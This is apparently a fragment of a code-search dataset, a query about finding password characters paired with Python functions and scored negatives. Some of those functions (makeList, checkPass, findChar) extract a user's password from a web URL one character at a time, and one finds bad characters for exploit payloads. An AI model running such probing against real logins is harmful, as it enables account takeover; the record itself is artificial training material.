y = np.zeros((len(sentences), len(syms)), dtype=np.bool)\n for i, sentence in enumerate(sentences):\n for t, sym in enumerate(sentence):\n X[i, t, sym_indices[sym]] = 1\n y[i, sym_indices[next_syms[i]]] = 1\n\n return (X,y)", "def latin1_to_ascii(self, unicrap):\n xlate = {0xc0: 'A', 0xc1: 'A', 0xc2: 'A', 0xc3: 'A', 0xc4: 'A', 0xc5: 'A',\n 0xc6: 'Ae', 0xc7: 'C',\n 0xc8: 'E', 0xc9: 'E', 0xca: 'E', 0xcb: 'E',\n 0xcc: 'I', 0xcd: 'I', 0xce: 'I', 0xcf: 'I',\n 0xd0: 'Th', 0xd1: 'N',\n 0xd2: 'O', 0xd3: 'O', 0xd4: 'O', 0xd5: 'O', 0xd6: 'O', 0xd8: 'O',\n 0xd9: 'U', 0xda: 'U', 0xdb: 'U', 0xdc: 'U',\n 0xdd: 'Y', 0xde: 'th', 0xdf: 'ss',\n 0xe0: 'a', 0xe1: 'a', 0xe2: 'a', 0xe3: 'a', 0xe4: 'a', 0xe5: 'a',\n 0xe6: 'ae', 0xe7: 'c',\n 0xe8: 'e', 0xe9: 'e', 0xea: 'e', 0xeb: 'e',\n 0xec: 'i', 0xed: 'i', 0xee: 'i', 0xef: 'i',\n 0xf0: 'th', 0xf1: 'n',\n 0xf2: 'o', 0xf3: 'o', 0xf4: 'o', 0xf5: 'o', 0xf6: 'o', 0xf8: 'o',\n 0xf9: 'u', 0xfa: 'u', 0xfb: 'u', 0xfc: 'u',\n 0xfd: 'y', 0xfe: 'th', 0xff: 'y',\n 0xa1: '!', 0xa2: '{cent}', 0xa3: '{pound}', 0xa4: '{currency}',\n 0xa5: '{yen}', 0xa6: '|', 0xa7: '{section}', 0xa8: '{umlaut}',\n 0xa9: '{C}', 0xaa: '{^a}', 0xab: '<<', 0xac: '{not}',\n 0xad: '-', 0xae: '{R}', 0xaf: '_', 0xb0: '{degrees}',\n 0xb1: '{+/-}', 0xb2: '{^2}', 0xb3: '{^3}', 0xb4: \"'\",\n 0xb5: '{micro}', 0xb6: '{paragraph}', 0xb7: '*', 0xb8: '{cedilla}',\n 0xb9: '{^1}', 0xba: '{^o}', 0xbb: '>>',\n 0xbc: '{1/4}', 0xbd: '{1/2}', 0xbe: '{3/4}', 0xbf: '?',\n 0xd7: '*', 0xf7: '/'\n }\n\n r = ''\n for i in unicrap:\n if xlate.has_key(ord(i)):\n r += xlate[ord(i)]\n elif ord(i) >= 0x80:\n pass\n else:\n r += str(i)\n return r", "def __init__(self, from_word, to_word, ws):\n (self._from_word, self._to_word, self._word_set) = (from_word,\n to_word, ws)\n # set of characters to use for 1-character changes\n self._chars = \"abcdefghijklmnopqrstuvwxyz\"", "def supercombiner(bot, ev):\n # ported from jenni\n s = 'u'\n for i in iter(range(1, 3000)):\n if unicodedata.category(chr(i)) == \"Mn\":\n s += chr(i)\n if len(s) > 100:\n break\n bot.say(s)", "def __init__(self, from_word, to_word, ws):\n (self._from_word, self._to_word, self._word_set) = (from_word,\n to_word, ws)\n # set of characters to use for 1-character changes\n self._chars = \"abcdefghijklmnopqrstuvwxyz\"\n\n # implement __eq__ and __str__\n # __repr__ is up to you", "def decode(s):\n start = 0\n multiplier = 1\n for char in s[::-1]:\n start += multiplier * LETTERS.index(char)\n multiplier = multiplier * 58\n return start", "def test_multiple_char_unique(self):\n self.assertTrue(all_unique_chars(\"ab\"))\n self.assertTrue(all_unique_chars(\"ba\"))\n self.assertTrue(all_unique_chars(\"make\"))\n self.assertTrue(all_unique_chars(\"thorn\"))\n self.assertTrue(all_unique_chars(\"malibu\"))\n self.assertTrue(all_unique_chars(string.ascii_letters))", "def __init__(self):\n self.file_name = 'assets/a.jpg'\n self.digit_to_word = {y: x for x, y in zip(list(string.ascii_uppercase), range(26))}\n self.digit_to_word[-1] = '?'", "def test_analyze_syntax_utf8():\n test_string = \"a \\u00e3 \\u0201 \\U0001f636 b\"\n byte_array = test_string.encode(\"utf8\")\n result = analyze.analyze_syntax(test_string, encoding=\"UTF8\")\n tokens = result[\"tokens\"]\n\n assert tokens[0][\"text\"][\"content\"] == \"a\"\n offset = tokens[0][\"text\"].get(\"beginOffset\", 0)\n assert (\n byte_array[offset : offset + 1].decode(\"utf8\") == tokens[0][\"text\"][\"content\"]\n )\n\n assert tokens[1][\"text\"][\"content\"] == \"\\u00e3\"\n offset = tokens[1][\"text\"].get(\"beginOffset\", 
0)\n assert (\n byte_array[offset : offset + 2].decode(\"utf8\") == tokens[1][\"text\"][\"content\"]\n )\n\n assert tokens[2][\"text\"][\"content\"] == \"\\u0201\"\n offset = tokens[2][\"text\"].get(\"beginOffset\", 0)\n assert (\n byte_array[offset : offset + 2].decode(\"utf8\") == tokens[2][\"text\"][\"content\"]\n )\n\n assert tokens[3][\"text\"][\"content\"] == \"\\U0001f636\"\n offset = tokens[3][\"text\"].get(\"beginOffset\", 0)\n assert (\n byte_array[offset : offset + 4].decode(\"utf8\") == tokens[3][\"text\"][\"content\"]\n )\n\n # This demonstrates that the offset takes into account the variable-length\n # characters before the target token.\n assert tokens[4][\"text\"][\"content\"] == \"b\"\n offset = tokens[4][\"text\"].get(\"beginOffset\", 0)\n # 'b' is only one byte long\n assert (\n byte_array[offset : offset + 1].decode(\"utf8\") == tokens[4][\"text\"][\"content\"]\n )", "def __setVarNames(self):\n result = set()\n\n # detecting variables\n for templatePart in self.inputString().split(\"{\"):\n if templatePart is '' or \"}\" not in templatePart:\n continue\n\n endIndex = templatePart.find('}')\n result.add(templatePart[:endIndex])\n\n self.__varNames = list(result)", "def char_to_seq( self, uchar ):\n\t\t\n\t\tlstParts = self._char39[ uchar ].split( '+' ) # [ 'nb', 'ns', 'nb', ... ]\n\t\t# Force evaluation with globals definition and local object definition (say on self.x)\n\t\treturn [ eval( '_'+code, globals(), self.__dict__ ) for code in lstParts ]", "def make_control_character():\n # Add one character made up of one codepoint each from\n # (High Surrogates + High Private Use Surrogates) and Low Surrogates.\n # We expect each such pair to behave as a single high-codepoint\n # character.\n controls = ('0000', '001F')\n return [unicode_char(char)\n for char in range(int(controls[0], 16), int(controls[1], 16)+1)]", "def get_charset(self, default: str) -> str:\n ..." ]
[ "0.58729345", "0.5847239", "0.58128977", "0.56627953", "0.5647866", "0.56441444", "0.56391495", "0.5624327", "0.55717635", "0.55333704", "0.5514946", "0.5514946", "0.5495993", "0.5446798", "0.544425", "0.5440407", "0.54331005", "0.54176193", "0.5314018", "0.5313979", "0.5313128", "0.5309224", "0.5298356", "0.527755", "0.52611935", "0.52510184", "0.52496505", "0.5229648", "0.5205429", "0.51906306", "0.5186572", "0.51775104", "0.5175352", "0.5168285", "0.5165016", "0.5161325", "0.513823", "0.5129395", "0.5120737", "0.5090299", "0.50884044", "0.5086532", "0.508054", "0.5073912", "0.50552005", "0.5049577", "0.50485075", "0.5044567", "0.50406665", "0.5039525", "0.50372297", "0.50262475", "0.5022382", "0.5013801", "0.49921584", "0.4981898", "0.4968761", "0.49659765", "0.49619576", "0.49501508", "0.4942157", "0.49290454", "0.49225268", "0.49098757", "0.49058565", "0.48963648", "0.48909965", "0.48828423", "0.48796335", "0.48734087", "0.48726767", "0.48714727", "0.48702624", "0.4860891", "0.48569196", "0.48562714", "0.485253", "0.4844364", "0.48440045", "0.48353714", "0.48350587", "0.48342454", "0.48306805", "0.4829435", "0.4827993", "0.48257175", "0.48242673", "0.48241824", "0.48232907", "0.48168135", "0.48143786", "0.4810746", "0.48079836", "0.4801823", "0.47995263", "0.4796911", "0.47926712", "0.4791584", "0.47910103", "0.47903904" ]
0.53112906
21
checks for common characters in the password and returns the characters contained somewhere in the password string
def makeList(username, url, caseSensitive = False, wildCards = True):
    charList = []
    for ch in lower:  # check for ch in
        if(checkPasswordCharacter(str(ch), username, url)):
            charList.append(str(ch))
            print(ch)
    for ch in numbers:
        if(checkPasswordCharacter(str(ch), username, url)):
            charList.append(str(ch))
            print(ch)
    for ch in special:
        if(checkPasswordCharacter(str(ch), username, url)):
            charList.append(str(ch))
            print(ch)
    for ch in other:
        if(checkPasswordCharacter(str(ch), username, url)):
            charList.append(str(ch))
            print(ch)
    if(caseSensitive):
        for ch in upper:
            if(checkPasswordCharacter(str(ch), username, url)):
                charList.append(str(ch))
                print(ch)
    if(wildCards):
        for ch in wildcards:
            if(checkPasswordCharacter(str(ch), username, url)):
                charList.append(str(ch))
                print(ch)
    return charList
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def analyze_password(password):\n vowels = number_of_vowels(password)\n if valid_password(password) is True:\n result = password + \" is a valid password and contains \" + str(vowels) + \" vowels.\"\n else:\n result = password + \" is not a valid password and contains \" + str(vowels) + \" vowels.\"\n return result", "def generate_password():\n selection = string.ascii_letters + string.digits\n\n while True:\n password = \"\".join(secrets.choice(selection) for i in range(16))\n\n if (\n any(c.isupper() for c in password)\n and any(c.islower() for c in password)\n and any(c.isdigit() for c in password)\n ):\n break\n\n return password", "def is_valid_password_v2(password):\n\n low = password[\"letter\"] == password[\"password\"][password[\"low\"] - 1]\n high = password[\"letter\"] == password[\"password\"][password[\"high\"] - 1]\n\n return xor(low, high)", "def is_complex(password):\n if len(password) >= 12:\n if any(c.isupper() for c in password):\n if any(c.islower() for c in password):\n if any(c.isdigit() for c in password):\n if any(c in punctuation for c in password):\n return True\n return False", "def valid_password(password):\n val = True\n\n if len(password) < 8:\n val = False\n return val\n\n if not any(char.isdigit() for char in password):\n val = False\n return val\n\n if not any(char.isupper() for char in password):\n val = False\n return val\n\n if not any(char.islower() for char in password):\n val = False\n return val\n\n if val:\n return val", "def solve_part_two(self):\n password = list(\"XXXXXXXX\")\n index = 0\n counter = 0\n while counter < 8:\n (s, found_index) = self.find_next_hash(index)\n index = found_index + 1\n offset = ord(s[5]) - ord(\"0\")\n # Offset invalid or password character already set previously?\n if offset >= 8 or password[offset] != \"X\":\n continue\n password[offset] = s[6]\n counter += 1\n return \"\".join(password)", "def check_pass(password):\n # big_chain : length of longest chain of repeated symbols\n # c_start : index at which big_chain starts\n big_chain = 0\n cur_loc = 0\n for symb in password:\n if big_chain == 0:\n l_symb = symb\n cur_chain = 1\n big_chain = 1\n c_start = 0\n cur_c = cur_loc\n cur_loc += 1\n continue\n if symb == l_symb:\n cur_chain += 1\n else:\n cur_chain = 1\n cur_c = cur_loc\n if cur_chain > big_chain:\n big_chain = cur_chain\n c_start = cur_c\n cur_loc += 1\n l_symb = symb\n\n # return or repeat, need big_chain, c_start\n if big_chain < 2:\n return False\n if big_chain == 2:\n return True\n return (check_pass(password[:c_start])\n or check_pass(password[c_start+big_chain:]))", "def validate_password(password):\n return isinstance(password, str) and len(password) >= 8 and \\\n re.search(r'[A-Z]', password) and re.search(r'[0-9]', password)", "def password(self) -> str:", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def _validatePassword(password):\n\n uppercaseChars = re.search('[A-Z]', password)\n lowercaseChars = re.search('[a-z]', password)\n\n if len(password) < 8:\n raise Exception(\"Password must be at lest 8 letters\")\n elif re.search('[0-9]', 
password) is None:\n raise Exception(\"Password must contain atleast one number\")\n elif uppercaseChars is None or lowercaseChars is None:\n raise Exception(\"Password must contain upper and lowercase letters\")\n else:\n return password", "def if_unique_chars_two(s):\n\tpass", "def invalid_password(password):\n special_characters = ['$', '#', '@']\n password = password.replace(\" \", \"\")\n test_conditions = [\n (len(password) >= 8 and len(password) <= 12),\n (any(x.isupper() for x in password) and any(x.islower()\n for x in password)),\n (any(y in password for y in special_characters)\n and any(y.isdigit() for y in password))\n ]\n if all(condition is True for condition in test_conditions):\n return False\n return True", "def _password_validate(s):\n if len(s) < 6:\n raise ValueError('Passwords must be at least 6 characters long')\n allowed_characters = frozenset(string.ascii_letters + string.digits +\n string.punctuation)\n if frozenset(s).issuperset(allowed_characters):\n raise ValueError('Invalid character in password: '\n 'use letters, numbers and punctuation')\n\n return", "def valid_password(lower, upper, letter, password):\n # Note the -1 to turn 1 indexing into 0 indexing\n matches = [idx for idx in (lower, upper) if password[idx - 1] == letter]\n return len(matches) == 1", "def checkPass(username, url, charList, n):\n # dikt = {}\n password = \"\"\n for i in range(0, n):\n if(testPassword(password, username, url)):\n return password #password is found! \n # https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python\n ch = findChar(username, url, charList, i)\n # if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string \n # use try except instead of if(isinstance(ch, int)):\n # https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not\n try: \n password += ch\n except TypeError:\n # print(i)\n password += str(ch) #should be blank\n # raise ValueError(\"index i has no matching character\")\n return password #only reached if password is too long for the given n", "def is_valid_password(variable):\n if re.match(r'[A-Za-z0-9@#$%^&+=]{8,}', variable):\n return True\n return False", "def test05_password_special(self):\n self.set_complexity(length=0, numeric=0, upper=0, lower=0, special=5)\n\n invalid = (\n \"A\",\n \"!!!!\",\n \"!A_B@C£D\",\n \"@@PASSWORD123!!\",\n \"ADMIN\",\n \"A1aB2bC3cD4dE5eF6fG7g\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"_____\",\n \"_!@£$\",\n \"A!B@C£D$F%\",\n \"Tr0ub4dor&3!@£$\",\n \"1234;.,/]1234\",\n \"a!A@0£b$B%0^c&C*0(d)D_0+e\",\n 'password1234\\'\"\"\"\"\"',\n \"p@$$w@*d\",\n )\n self.set_passwords(valid)", "def solve_part_one(self):\n password = \"\"\n index = 0\n while len(password) < 8:\n (s, found_index) = self.find_next_hash(index)\n password += s[5]\n index = found_index + 1\n return password", "def password():\n chars = \"abcdefghijklmnopqsrtuvwxyzABCDEFGHIJKLMNOPQSRTUVWXYZ\"\\\n \"123456890!#%&-_*<>+=()\"\n return ''.join(random.sample(chars, 15))", "def check_pwd_policy2(processed):\n policy, letter, pwd = processed\n idx1 = policy[0] - 1\n idx2 = policy[-1] - 1\n return (pwd[idx1] == letter) ^ (pwd[idx2] == letter)", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def check_pwd_policy1(processed):\n policy, letter, pwd = 
processed\n return pwd.count(letter) in policy", "def bytes_to_chars(passwd):\n return passwd[1::2]", "def valid_password(password):\n password_regex = re.compile(r\"^.{8,20}$\")\n return password and password_regex.match(password)", "def get_password():\n\n pwd = getpass(\"Enter your password below. It is used to protect your credentials.\\n\"\n \"The password must have a minimum length of 8 characters \"\n \"and can only contain alphanumeric characters and symbols.\\n\"\n \"Enter password (will be hidden): \")\n\n tries = 0 # Limit number of invalid attempts\n while True:\n if len(pwd) >= 8 and pwd.isascii() and pwd.isprintable() and ' ' not in pwd:\n if getpass(\"Confirm password: \") == pwd:\n return pwd\n else:\n print(\"Password mismatch!\")\n else:\n print(\"Invalid characters in password or too short!\")\n\n if tries == 3: return None\n pwd = getpass(\"\\nRe-enter password: \")\n tries += 1", "def anypassword():\n\n characters = string.ascii_uppercase + string.ascii_lowercase + string.digits\n size = random.randint(8, 12)\n password = ''.join(random.choice(characters) for x in range(size))\n\n return password", "def password (string):\n\t\n\treturn hexdigest_mySQL41plus (string)", "def is_valid_password(password):\n assert password is not None\n password = str(password)\n return len(password) >= 8 and any(s.islower() for s in password) \\\n and any(s.isupper() for s in password) \\\n and any(s.isdigit() for s in password)", "def password_validates(password):\n if any(char.isdigit() for char in password) \\\n and any(char.isalpha() for char in password) \\\n and len(password) > 5:\n return True\n else:\n return False", "def findChar(username, url, charList, i):\n for ch in charList:\n if(checkPasswordCharacter(ch, username, url, index = i)):\n return ch\n #only runs if no ch in charList match:\n # return i #oof, there's no match if i is out of bounds, e.g. len(password) < i\n print(\"Missing: \" + i) #so I know when it's not a match\n return \"\" #return an empty string instead\n # Note to self: should not return an _ because it'll match an _ if wildCards are true (default). \n # If wildCards is false, this will just skip characters that don't match anything!", "def password_is_valid_2(password, character, num_1, num_2):\n char_1 = password[num_1 - 1] # position is 1-based, not 0-based as would be Python default\n char_2 = password[num_2 - 1]\n\n return (char_1 == character or char_2 == character) and char_1 != char_2", "def find_password( door_id ):\n\n\tpassword = [ '', '', '', '', '', '', '', '' ]\n\tincrementor = 0\n\t\n\tfor _i in range( 8 ):\n\t\tchar = ''\n\t\twhile not char:\n\t\t\t#_do_stupid_movie_password_animation( password, _i )\n\n\t\t\tinput = door_id + str( incrementor )\n\t\t\tm = hashlib.md5( )\n\t\t\tm.update( input.encode( 'utf-8' ) )\n\t\t\thash = m.hexdigest( )\n\n\t\t\tif hash.startswith( '00000' ):\n\t\t\t\tloc = hash[ 5 ]\n\t\t\t\tchar = hash[ 6 ]\n\t\t\t\tif loc.isdigit( ):\n\t\t\t\t\tloc = int( loc )\n\t\t\t\t\tif 0 <= loc <= ( len( password ) - 1 ) and not password[ loc ]:\n\t\t\t\t\t\tpassword[ loc ] = char\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tchar = ''\n\t\t\t\telse:\n\t\t\t\t\tchar = ''\n\t\t\t\n\t\t\tincrementor += 1\n\n\tpassword = ''.join( password )\n\treturn password", "def clean_password(self):\n password = self.cleaned_data['password']\n\n if CHECK_STRENGTH:\n if len(password) < MIN_PASSWORD_LEN:\n raise forms.ValidationError('Password must have at least %i characters.' 
% MIN_PASSWORD_LEN)\n\n symbols = set(password)\n\n if not ((_digit & symbols and _upper & symbols) or \\\n (_digit & symbols and _lower & symbols) or \\\n (_lower & symbols and _upper & symbols)):\n raise forms.ValidationError('Password is too week. Invent better one.')\n\n return password", "def test06_password_mixture(self):\n self.set_complexity(length=14, numeric=1, upper=1, lower=1, special=1)\n\n invalid = (\n \"A\",\n \"ACBDEabcde!!!!\",\n \"Tr0ub4dor&3\",\n \"!A_B@C£D\",\n \"@@PASSWORD123!!\",\n \"ADMIN\",\n \"A1aB2bC3cD4dE5eF6fG7g\",\n \"1234;.,/]1234\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"Sixteenchars12@_\",\n \"thisis4reallybadPassword!\",\n \"C0rrecthorsebatteryst@ple\",\n \"a!A@0£b$B%0^c&C*0(d)D_0+e\",\n 'Password1234\\'\"\"\"\"\"',\n )\n self.set_passwords(valid)", "def check_password(raw_password, enc_password):\n algo, salt, hsh = enc_password.split('$')\n return constant_time_compare(hsh, get_hexdigest(algo, salt, raw_password))", "def clean_password(self):\n if 'password' in self.cleaned_data:\n PWD_MIN_CHAR = 8\n PWD_MAX_CHAR = 45\n\n pattern = \"(?=^.{%i,%i}$)((?=.*\\\\d)(?=.*[A-Z])(?=.*[a-z])(?=.*[^A-Za-z0-9]))^.*\" % (PWD_MIN_CHAR, PWD_MAX_CHAR)\n\n if re.match(pattern, self.cleaned_data['password']) is None:\n raise forms.ValidationError('Valid password should contain at least %i alphanumeric characters. Contain both upper and lower case letters. Contain at least one number (for example, 0-9). Contain at least one special character (for example,!@#$%%^&*()+=-[]\\\\\\';,./{}|\\\":?~_<>)' % PWD_MIN_CHAR)\n\n return self.cleaned_data['password']", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def verify_password(password):\n password_reg_exp = re.compile(r\"^.{3,20}$\")\n return password and password_reg_exp.match(password)", "def passwd_prompt():\n\n print(\"Passwords MUST contain AT LEAST: one lower-case letter,\" \n \"one number, one symbol, and be a MINIMUM of 8 characters in length,\"\n \"e.g. r!ght2oE\")\n\n while True:\n\n passy = getpass.getpass(prompt=\"Enter password for user: \")\n confirm_passy = getpass.getpass(prompt=\"To confirm, \" \\\n \"re-enter password: \")\n\n # check for the following conditions: \n # user input matches\n # length of input is at least 8 characters\n # input contains at least 1 number \n # input contains at least 1 letter \n # input contains at least 1 symbol \n \n if passy != confirm_passy \\\n or len(passy) <8 \\\n or not re.search('\\d', passy) \\\n or not re.search(r\"[a-z]\",passy) \\\n or not re.search(r\"[ !#$%&'()*+,-./[\\\\\\]^_`{|}~\"+r'\"]', passy): \n \n print(TRY_AGAIN)\n continue \n \n else:\n print(\"Password meets complexity requirement. 
Continuing...\") \n return passy", "def get_user_password(text):\n return getpass.getpass(text)", "def has_right_symbols(string):\n for letter in string:\n if letter in \"$#@\":\n return True\n # End of the loop, we still didn't see any numbers, else we \n # woud have exited the function\n print(\"Your password needs to contain one of those symbols: $#@\")\n return False", "def test_generate_secret(self):\n random_secret = ef_password.generate_secret(24)\n self.assertEqual(len(random_secret), 24)\n assert not set('[~!@#$%^&*()_+{}\":;\\']+$').intersection(random_secret)", "def test_check_password():\n assert check_password('Longpassword') == False\n assert check_password('123456') == False\n assert check_password('short') == False\n assert check_password('C0rect') == False\n assert check_password('Correct8') == True", "def pass_check(user_found):\n password = ''\n while password != user_found[1]:\n password = stdiomask.getpass(prompt=\"Please enter your password: \", mask='*')\n pass1 = encrypter.encrypt_password(password)\n if user_found[1] == pass1:\n return \"\\nPassword match\\n\"\n else:\n print(\"\\nPassword do not match\\n\")", "def brute_force_attack(string):\n try:\n for key in range(1, 26):\n string_to_return = \"\"\n for l in string:\n if not(l >= 'A'and l <= 'Z' or l >= 'a'and l <= 'z'):\n string_to_return += l\n elif key + ord(l.upper()) > ord('Z'):\n string_to_return += chr(ord('A') + ord('Z') - ord(l.upper()))\n else:\n string_to_return += chr(ord(l.upper())+key)\n print(string_to_return)\n return string_to_return\n except Exception as ex:\n print(EXCEPTION_MESSAGE, ex)", "def password_is_valid_1(password, character, num_1, num_2):\n # count how often does each character occurs\n counter = Counter(password)\n character_count = counter[character] # defaults to zero if character doesn't exist at all\n return num_1 <= character_count <= num_2", "def verify_password(entered_password):\n return PASSWORD_RE.match(entered_password)", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def search_bad_chars() -> str:\n\n lines = get_input()\n bad_chars = \"\\\\\"+hex(0) # x00 is always a badchar\n \n for i in range(1,255,8):\n for i in range(i,i+7):\n lines[i] = int(lines[i],16)\n if(hex(i) != hex(lines[i])):\n bad_chars += \"\\\\\"+hex(i)\n \n print(\"Found these bad characters:\",bad_chars)\n\n return bad_chars", "def get_password(wordlen, digitlen, words, strength):\n\n while True:\n\n try:\n w = words.pop().capitalize()\n except IndexError:\n sys.exit(\"Unable to get a sufficiently strong password\")\n\n s = np.random.choice(SPECIAL_CHARS)\n i = np.random.randint(0, 10**digitlen)\n\n comp = [w, f\"{i:0{digitlen}d}\", s, s]\n np.random.shuffle(comp)\n pw = ''.join(comp)\n\n # pw = str(f\"{s}{w}{i:0{digitlen}d}{s}\")\n stats_pw = PasswordStats(pw)\n\n if stats_pw.strength() >= strength:\n return pw, stats_pw", "def is_strong(password):\n # at least eight characters 
long\n if len(password) < 8:\n return False\n\n # contains both uppercase and lowercase characters\n upper = re.compile(r\"[A-Z]\")\n up = upper.search(password)\n lower = re.compile(r\"[a-z]\")\n low = lower.search(password)\n\n # has at least one digit\n digit = re.compile(r'[0-9]')\n dig = digit.search(password)\n\n if up is None or low is None or dig is None:\n return False\n\n return True", "def password_validator(username, password):\n digits = re.search(r'\\d+', password)\n capital_letters = re.search(r'[A-Z]+', password)\n lenght = len(password) > PASSWORD_MIN_LENGTH\n special_symbol = re.search(r'[\\-\\/\\@\\?\\!\\,\\.\\#\\&\\*]+', password)\n\n statement = digits and capital_letters and lenght and special_symbol\n\n if statement:\n return True\n return False", "def get_password(args):\n for password in args:\n heashed=hash_password(password)\n print(heashed)\n # checked=check_password(heashed)", "def validate_password(password):\n if re.match(r\"^[a-zA-Z0-9]{10,30}$\", password):\n return True\n return False", "def non_secret_char(c):\n return c", "def password_validator(password: str) -> bool:\n uppercase_regex = re.compile(r\"[A-Z]+\")\n lowercase_regex = re.compile(r\"[a-z]+\")\n digit_regex = re.compile(r\"\\d+\")\n\n if len(password) < 8:\n return False\n if not uppercase_regex.findall(password):\n return False\n if not lowercase_regex.findall(password):\n return False\n if not digit_regex.findall(password):\n return False\n else:\n return True", "def clean_password1(self):\n if 'password1' in self.cleaned_data and self.cleaned_data['password1']:\n PWD_MIN_CHAR = 8\n PWD_MAX_CHAR = 45\n\n pattern = \"(?=^.{%i,%i}$)((?=.*\\\\d)(?=.*[A-Z])(?=.*[a-z])(?=.*[^A-Za-z0-9]))^.*\" % (PWD_MIN_CHAR, PWD_MAX_CHAR)\n\n if re.match(pattern, self.cleaned_data['password1']) is None:\n raise forms.ValidationError('Valid password should contain at least %i alphanumeric characters. Contain both upper and lower case letters. Contain at least one number (for example, 0-9). 
Contain at least one special character (for example,!@#$%%^&*()+=-[]\\\\\\';,./{}|\\\":?~_<>)' % PWD_MIN_CHAR)\n\n return self.cleaned_data['password1']", "def check_password(raw_password, enc_password):\n algo, salt, hsh = enc_password.split('$')\n return hsh == get_hexdigest(algo, salt, raw_password)", "def check_password(raw_password, enc_password):\n algo, salt, hsh = enc_password.split('$')\n return hsh == get_hexdigest(algo, salt, raw_password)", "def is_valid_password(self, password):\n rex = \"^[a-zA-Z0-9@_+-.]{3,}$\"\n return re.match(rex, password)", "def other_chars(self):\n return re.findall(r'[,.!?_\\':;/#%*\\=@\"]', self.text)", "def is_palindrome_ingoring_case_and_non_letter_chars(text):", "def find_valid_passwords(values: List[str]) -> int:\n search_reg = re.compile(\n r\"\\b(?P<first>[0-9]+)-(?P<second>[0-9]+)\\s(?P<letter>[a-z]):\\s(?P<password>[a-z]+)\")\n valid_password_count = 0\n\n for value in values:\n results = search_reg.search(value)\n target_char = results.group(\"letter\")\n password = results.group(\"password\")\n first_index = int(results.group(\"first\")) - 1\n second_index = int(results.group(\"second\")) - 1\n\n if (target_char == password[first_index]) != (target_char == password[second_index]):\n valid_password_count += 1\n\n return valid_password_count", "def pw_is_viable(password: str) -> bool:\n logging.debug(\"called\")\n if not any([\n not password,\n len(password) < 8,\n not any(map(lambda x: x.isdigit(), password)),\n not any(map(lambda x: x.isupper(), password)),\n not any(map(lambda x: x.islower(), password)),\n not any(map(lambda x: x in SPECIAL_CHARACTERS, password)),\n ]):\n return True\n else:\n raise PasswordError(\"Password should contain at least a digit, an uppercase, a lower case, and special \"\n \"characters and should be at least 8 digits in total.\", password)", "def valida_digito(password):\n for s in password:\n if s.isdigit() == True: \n return True\n return False", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def test_multiple_char_not_unique(self):\n self.assertFalse(all_unique_chars(\"aa\"))\n self.assertFalse(all_unique_chars(\"alabama\"))\n self.assertFalse(all_unique_chars(\"Ricardio\"))\n self.assertFalse(all_unique_chars(\"aardvark\"))\n self.assertFalse(all_unique_chars(\"Zimbabwe\"))\n self.assertFalse(all_unique_chars(\"....What?....\"))", "def contains_only_double_digit(password: int) -> bool:\n word = str(password)\n\n if word[0] == word[1] and word[0] != word[2]:\n return True\n if word[-2] == word[-1] and word[-2] != word[-3]:\n return True\n\n for i in range(1, len(word)-2):\n if word[i] == word[i+1] and word[i] != word[i+2] and word[i] != word[i-1]:\n return True\n\n return False", "def _hashPassword(password):\n charset = './' + ascii_letters + digits\n return crypt.crypt(password, ''.join(random.sample(charset, 2)))", "def is_allowed_password(password):\n if not is_filled_password(password):\n return \"Password is a required field.\"\n elif not is_regex_password(password):\n return \"That is not a valid password.\"\n else:\n return \"\"", "def solve():\n cipher_bytes = get_cipher_bytes()\n best_so_far = 0\n message = None\n for password in get_passwords_iterator():\n possible_message = decrypt_cipher(cipher_bytes, password)\n if possible_message:\n num_spaces = len(filter(lambda x: x == ' ', possible_message))\n if num_spaces >= best_so_far:\n best_so_far = num_spaces\n message = possible_message\n print ''.join(message)\n 
